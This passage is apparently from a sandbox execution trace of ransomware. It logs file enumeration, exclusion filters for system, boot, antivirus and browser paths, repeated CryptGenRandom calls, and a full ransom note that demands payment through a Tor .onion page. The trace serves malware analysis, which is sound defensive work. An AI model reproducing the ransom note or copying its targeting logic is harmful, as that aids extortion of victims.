_String2=".") returned 1 [0171.098] wcscmp (_String1="root", _String2="..") returned 1 [0171.098] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 1 [0171.098] wcscmp (_String1="Updates", _String2=".") returned 1 [0171.098] wcscmp (_String1="Updates", _String2="..") returned 1 [0171.098] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7f25c | out: lpFindFileData=0x2d7f25c) returned 0 [0171.098] GetLastError () returned 0x12 [0171.098] FindClose (in: hFindFile=0x9ad1f8 | out: hFindFile=0x9ad1f8) returned 1 [0171.098] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Recovers your files.html" (normalized: "c:\\program files\\microsoft office\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0171.099] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0171.099] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0171.100] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0171.100] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0171.100] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0171.100] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0171.100] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0171.100] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0171.100] wcslen (_String="\\\\?\\") returned 0x4 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*.exe") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*.dll") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*.lnk") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*.bat") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*.ini") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*.msi") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*.scf") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*pagefile.sys*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*NTUSER.DAT*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*AppData*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\winrar\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\java\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\windows\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\ESET\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\AVG\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\AVIRA\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*Atheros*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*Realtek*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*bootmgr*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*boot*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*boot*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*CONFIG.SYS*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*IO.SYS*") returned 0 [0171.100] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*MSDOS.SYS*") returned 0 [0171.101] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*NTDETECT.COM*") returned 0 [0171.101] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*ntldr*") returned 0 [0171.101] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*chrome*") returned 0 [0171.101] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*opera*") returned 0 [0171.101] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\*", pszSpec="*firefox*") returned 0 [0171.101] wcslen (_String="\\\\?\\") returned 0x4 [0171.101] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\*", lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0x9ad1b8 [0171.101] wcscmp (_String1=".", _String2=".") returned 0 [0171.101] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0171.101] wcscmp (_String1="..", _String2=".") returned 1 [0171.101] wcscmp (_String1="..", _String2="..") returned 0 [0171.101] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*NMCRYPT") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*Recovers your files.html") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*.exe") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*.dll") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*.lnk") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*.bat") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*.ini") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*.msi") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*.scf") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*pagefile.sys*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*NTUSER.DAT*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*AppData*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\winrar\\*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\Internet Explorer\\*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\java\\*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\TeamViewer\\*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\windows\\*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\ESET\\*") returned 0 [0171.101] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\AVG\\*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\AVIRA\\*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*\\AVAST Software\\*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*Atheros*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*Realtek*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*bootmgr*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*boot*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*boot*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*CONFIG.SYS*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*IO.SYS*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*MSDOS.SYS*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*NTDETECT.COM*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*ntldr*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*chrome*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*opera*") returned 0 [0171.102] PathMatchSpecW (pszFile="OSPP.HTM", pszSpec="*firefox*") returned 0 [0171.102] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM", pszSpec="*") returned 1 [0171.102] strlen (_Str="NMoreira") returned 0x8 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.104] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0171.105] CryptGenRandom (in: hProv=0x8bf310, 